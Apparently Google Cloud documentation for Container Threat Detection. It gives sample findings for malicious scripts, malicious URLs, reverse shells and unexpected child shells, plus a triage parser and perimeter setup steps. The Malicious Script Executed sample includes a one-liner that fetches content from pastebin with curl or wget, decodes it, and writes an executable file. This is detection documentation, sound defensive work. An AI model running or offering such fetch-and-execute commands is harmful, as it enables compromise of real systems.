          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Malicious Script Executed

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Malicious Script Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Script_Filename": "FILENAME",
      "Script_SHA256": "SHA_256",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "INTERPRETER",
      "Process_Arguments": ["INTERPRETER", "FILENAME"],
      "Pod_Name": "POD_NAME",
      "description": "A machine learning model using Natural Language Processing (NLP) techniques identified an executed bash script as malicious.",
      "Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
      "Environment_Variables": [
        "KUBERNETES_PORT=tcp://IP_ADDRESS:PORT",
        "KUBERNETES_SERVICE_PORT=443",
        "HOSTNAME=reconnect-test-4af235e12be6f9d9",
        "HOME=/root",
        "KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
        "KUBERNETES_PORT_443_TCP_PORT=443",
        "KUBERNETES_PORT_443_TCP_PROTO=tcp",
        "DEBIAN_FRONTEND=noninteractive",
        "KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:PORT",
        "KUBERNETES_SERVICE_PORT_HTTPS=443",
        "KUBERNETES_SERVICE_HOST=IP_ADDRESS",
        "PWD=/"
      ],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_Content": {
        "primitiveDataType": "STRING"
      },
      "Script_Filename": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_SHA256": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Malicious URL Observed

    {
      "findings": {
        "access": {},
        "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
        "category": "Malicious URL Observed",
        "containers": [
          {
            "name": "CONTAINER_NAME",
            "uri": "CONTAINER_URI",
            "imageId": "CONTAINER_IMAGE_ID"
          }
        ],
        "createTime": "2022-09-14T21:35:46.209Z",
        "database": {},
        "description": "A malicious URL is observed in the container workload.",
        "eventTime": "2022-09-14T21:35:45.992Z",
        "exfiltration": {},
        "findingClass": "THREAT",
        "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
        "indicator": {
          "uris": [
            "testsafebrowsing.appspot.com/s/malware.html"
          ]
        },
        "kubernetes": {
          "pods": [
            {
              "ns": "default",
              "name": "CONTAINER_NAME",
              "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": "CONTAINER_IMAGE_ID"
                }
              ]
            }
          ]
        },
        "mitreAttack": {
          "primaryTactic": "COMMAND_AND_CONTROL",
          "primaryTechniques": [
            "INGRESS_TOOL_TRANSFER"
          ]
        },
        "mute": "UNDEFINED",
        "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
        "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
        "parentDisplayName": "Container Threat Detection",
        "processes": [
          {
            "binary": {
              "path": "\"/bin/echo\""
            },
            "script": {},
            "args": [
              "\"/bin/echo\"",
              "\"https://testsafebrowsing.appspot.com/s/malware.html\""
            ],
            "envVariables": [
              {
                "name": "\"PATH\"",
                "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
              },
              {
                "name": "\"HOSTNAME\"",
                "val": "\"CONTAINER_NAME\""
              },
              {
                "name": "\"DEBIAN_FRONTEND\"",
                "val": "\"noninteractive\""
              },
              {
                "name": "\"LANG\"",
                "val": "\"C.UTF-8\""
              },
              {
                "name": "\"PYTHONUNBUFFERED\"",
                "val": "\"1\""
              },
              {
                "name": "\"PORT\"",
                "val": "\"8080\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_HOST\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_PORT\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
                "val": "\"tcp\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"HOME\"",
                "val": "\"/root\""
              }
            ],
            "pid": "1"
          }
        ],
        "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "severity": "MEDIUM",
        "sourceDisplayName": "Container Threat Detection",
        "state": "ACTIVE",
        "vulnerability": {},
        "workflowState": "NEW"
      },
      "resource": {
        "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "display_name": "CLUSTER_ID",
        "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "project_display_name": "PROJECT_ID",
        "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "parent_display_name": "PROJECT_ID",
        "type": "google.container.Cluster",
        "folders": []
      },
      "sourceProperties": {
        "Container_Image_Id": "CONTAINER_IMAGE_ID",
        "Pod_Namespace": "default",
        "Container_Name": "CONTAINER_NAME",
        "Process_Binary_Fullpath": "/bin/echo",
        "description": "A malicious URL is observed in the container workload.",
        "VM_Instance_Name": "VM_INSTANCE_NAME",
        "Pid": 1,
        "Process_Arguments": [
          "/bin/echo",
          "https://testsafebrowsing.appspot.com/s/malware.html"
        ],
        "Container_Image_Uri": "CONTAINER_IMAGE_URI",
        "Parent_Pid": 0,
        "Process_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 7717272
        },
        "Environment_Variables": [
          "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=CONTAINER_NAME",
          "DEBIAN_FRONTEND=noninteractive",
          "LANG=C.UTF-8",
          "PYTHONUNBUFFERED=1",
          "PORT=8080",
          "KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
          "KUBERNETES_SERVICE_HOST=IP_ADDRESS",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443",
          "HOME=/root"
        ],
        "Container_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 0
        },
        "Pod_Name": "CONTAINER_NAME"
      }
    }
  

Reverse Shell

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Reverse Shell",
    "sourceProperties": {
      "Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
      "Environment_Variables": ["HOSTNAME\u003dreverse-shell",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
      "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Container_Creation_Timestamp": {
        "seconds": 1.617989861E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Container_Name": "CONTAINER_NAME",
      "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
      "Pid": 15.0,
      "Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
      "Pod_Namespace": "default",
      "VM_Instance_Name": "INSTANCE_ID",
      "Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
      "description": "A process started with stream redirection to a remote
      connected socket. With a reverse shell, an attacker can communicate from a
      compromised workload to an attacker-controlled machine. The attacker can
      then command and control the workload to perform desired actions, for
      example as part of a botnet.",
      "Parent_Pid": 1.0,
      "Process_Creation_Timestamp": {
        "seconds": 1.61798989E9,
        "nanos": 6.16573691E8
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:38:10.904Z",
    "createTime": "2021-04-09T17:38:15.486Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Reverse_Shell_Stdin_Redirection_Src_Ip": {
        "primitiveDataType": "STRING"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Reverse_Shell_Stdin_Redirection_Src_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Unexpected Child Shell

{
  "finding": {
    "access": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Unexpected Child Shell",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-06-29T17:34:13.765Z",
    "database": {},
    "description": "A process should not normally create child shell processes, spawn a child shell process.",
    "eventTime": "2023-06-29T17:34:13.492Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "ns": "default",
          "name": "CONTAINER_NAME",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": CONTAINER_IMAGE_ID"
            }
          ]
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER"
      ]
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/dash\"",
          "size": "31376",
          "sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
          "hashedSize": "31376",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/dash\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"PYTHONUNBUFFERED\"",
            "val": "\"1\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/home/vmagent/app\""
          },
          {
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
          },
          {
            "name": "\"SHLVL\"",
            "val": "\"1\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"PORT\"",
            "val": "\"8080\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"_\"",
            "val": "\"./temp/dash\""
          }
        ],
        "pid": "15",
        "parentPid": "14"
      },
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/httpd\"",
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/httpd\""
        ],
        "argumentsTruncated": false,
        "pid": "14",
        "parentPid": "13"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "Process_Arguments": [
      "./temp/dash"
    ],
    "Pid": 15,
    "Process_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 207040864
    },
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
    "VM_Instance_Name": "INSTANCE_ID",
    "Pod_Name": "POD_NAME",
    "Pod_Namespace": "default",
    "Container_Name": "CONTAINER_NAME",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Container_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 0
    },
    "Parent_Pid": 14,
    "Environment_Variables": [
      "HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",
      "KUBERNETES_PORT_443_TCP_PORT=443",
      "KUBERNETES_PORT=tcp://10.52.113.1:443",
      "PYTHONUNBUFFERED=1",
      "KUBERNETES_SERVICE_PORT=443",
      "KUBERNETES_SERVICE_HOST=10.52.113.1",
      "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "PWD=/home/vmagent/app",
      "LANG=C.UTF-8",
      "SHLVL=1",
      "HOME=/root",
      "KUBERNETES_PORT_443_TCP_PROTO=tcp",
      "KUBERNETES_SERVICE_PORT_HTTPS=443",
      "DEBIAN_FRONTEND=noninteractive",
      "PORT=8080",
      "KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",
      "KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",
      "_=./temp/dash"
    ]
  }
}
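The notification payloads above come in two shapes: the older Reverse Shell payload keeps everything under finding.sourceProperties, with numbers encoded as floats (Pid: 15.0) and environment variables as "K=V" strings, while the newer payloads add finding.processes (strings carrying literal wrapper quotes, pid/parentPid as strings) and place sourceProperties beside finding. The Python helper below is an added illustration, not code from Security Command Center or this page; it flattens either shape into one triage record (process ancestry, environment, and the reverse-shell remote endpoint), and the two sample payloads are constructed with placeholder values.

```python
import json

def _unquote(s):
    """Strip the literal wrapper quotes this format puts on processes[] strings."""
    s = str(s)
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == '"' else s

def _env(sp, proc):
    """Environment as a dict, from envVariables objects or from "K=V" strings."""
    if proc and proc.get("envVariables"):
        return {_unquote(e["name"]): _unquote(e["val"]) for e in proc["envVariables"]}
    return dict(kv.split("=", 1) for kv in sp.get("Environment_Variables", []) if "=" in kv)

def summarize_finding(notification):
    """Flatten a Container Threat Detection notification (either schema on this page) into one triage record."""
    f = notification.get("finding", {})
    # sourceProperties sits inside "finding" in older payloads and beside it in newer ones
    sp = f.get("sourceProperties") or notification.get("sourceProperties") or {}
    mitre = f.get("mitreAttack") or {}
    rec = {"category": f.get("category"), "severity": f.get("severity"), "cluster": f.get("resourceName"),
           "namespace": sp.get("Pod_Namespace"), "pod": sp.get("Pod_Name"), "container": sp.get("Container_Name"),
           "tactic": mitre.get("primaryTactic"), "techniques": list(mitre.get("primaryTechniques", [])),
           "process_chain": [], "remote": None}
    procs, leaf = f.get("processes") or [], None
    if procs:
        # Newer schema: start at the leaf (a pid nobody names as parentPid) and follow parentPid upwards.
        by_pid = {str(p.get("pid")): p for p in procs}
        parents = {str(p.get("parentPid")) for p in procs}
        leaf = next((p for p in procs if str(p.get("pid")) not in parents), procs[0])
        cur, seen = leaf, set()
        while cur is not None and str(cur.get("pid")) not in seen:  # guard against pid cycles
            seen.add(str(cur.get("pid")))
            rec["process_chain"].append({"pid": int(cur["pid"]),
                                         "binary": _unquote(cur.get("binary", {}).get("path", "")),
                                         "args": [_unquote(a) for a in cur.get("args", [])]})
            cur = by_pid.get(str(cur.get("parentPid")))
    else:
        # Older schema: numbers arrive as floats (Pid: 15.0) and strings carry no wrapper quotes.
        rec["process_chain"].append({"pid": int(float(sp.get("Pid", 0))),
                                     "binary": sp.get("Process_Binary_Fullpath"),
                                     "args": list(sp.get("Process_Arguments", []))})
    rec["env"] = _env(sp, leaf)
    dst_ip = sp.get("Reverse_Shell_Stdin_Redirection_Dst_Ip")
    if dst_ip:  # only Reverse Shell findings carry the remote endpoint
        rec["remote"] = f"{dst_ip}:{int(float(sp['Reverse_Shell_Stdin_Redirection_Dst_Port']))}"
    return rec

# Constructed sample payloads with placeholder values, shaped like this page's examples (not real findings).
SAMPLE_REVERSE_SHELL = json.loads(r'''{"finding": {"category": "Reverse Shell", "severity": "CRITICAL",
  "sourceProperties": {"Pid": 15.0, "Parent_Pid": 1.0, "Pod_Namespace": "default", "Pod_Name": "POD_NAME",
    "Container_Name": "CONTAINER_NAME", "Process_Binary_Fullpath": "BINARY_PATH",
    "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"], "Environment_Variables": ["HOSTNAME\u003dreverse-shell", "HOME\u003d/root"],
    "Reverse_Shell_Stdin_Redirection_Dst_Ip": "203.0.113.10", "Reverse_Shell_Stdin_Redirection_Dst_Port": 12345.0}}}''')
SAMPLE_CHILD_SHELL = {"finding": {"category": "Unexpected Child Shell", "severity": "CRITICAL",
  "mitreAttack": {"primaryTactic": "EXECUTION", "primaryTechniques": ["COMMAND_AND_SCRIPTING_INTERPRETER"]},
  "processes": [{"binary": {"path": "\"/home/vmagent/app/temp/dash\""}, "args": ["\"./temp/dash\""],
                 "envVariables": [{"name": "\"HOME\"", "val": "\"/root\""}], "pid": "15", "parentPid": "14"},
                {"binary": {"path": "\"/home/vmagent/app/temp/httpd\""}, "args": ["\"./temp/httpd\""], "pid": "14", "parentPid": "13"}]},
  "sourceProperties": {"Pod_Namespace": "default", "Pod_Name": "POD_NAME", "Container_Name": "CONTAINER_NAME"}}
```

Feeding a Pub/Sub notification body to summarize_finding yields the same record regardless of which schema the finding arrived in, which is what a downstream alert router or SIEM mapping needs.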
    

Scanning projects protected by a service perimeter

If you activated Security Command Center at the organization level after December 7, 2023 and have a service perimeter that blocks access to certain projects and services, you must grant Container Threat Detection ingress access to that service perimeter. Otherwise, Container Threat Detection cannot produce findings related to the protected projects and services.

For organization-level activations, the service account ID is an email address in the following format:

service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

In the preceding example, replace ORGANIZATION_ID with the numeric ID of your organization.

To grant the service account ingress access to the service perimeter, follow these steps.

  1. Go to VPC Service Controls.

  2. In the toolbar, select your Google Cloud organization.

  3. In the drop-down menu, select the access policy that contains the service perimeter you want to grant access to.

    The service perimeters associated with the access policy appear in the list.

  4. Click the name of the service perimeter.

  5. Click Edit perimeter.

  6. In the navigation menu, click Ingress Policy.

  7. Click Add Rule.

  8. Configure the rule as follows:

    FROM attributes of the API client

    1. For Source, select All sources.
    2. For Identity, select Selected identities.
    3. In the Add User/Service Account field, click Select.
    4. Enter the email address of the service account. If you have both an organization-level and a project-level service account, add both.
    5. Click Save.

    TO attributes of GCP services/resources

    1. For Project, select All projects.

    2. For Services, select All services, or select each of the following individual services that Container Threat Detection requires:

      • Container Threat Detection API

      If the service perimeter restricts access to a required service, Container Threat Detection cannot generate findings for that service.

    3. In the navigation menu, click Save.

    For more information, see Configuring ingress and egress policies.

What's next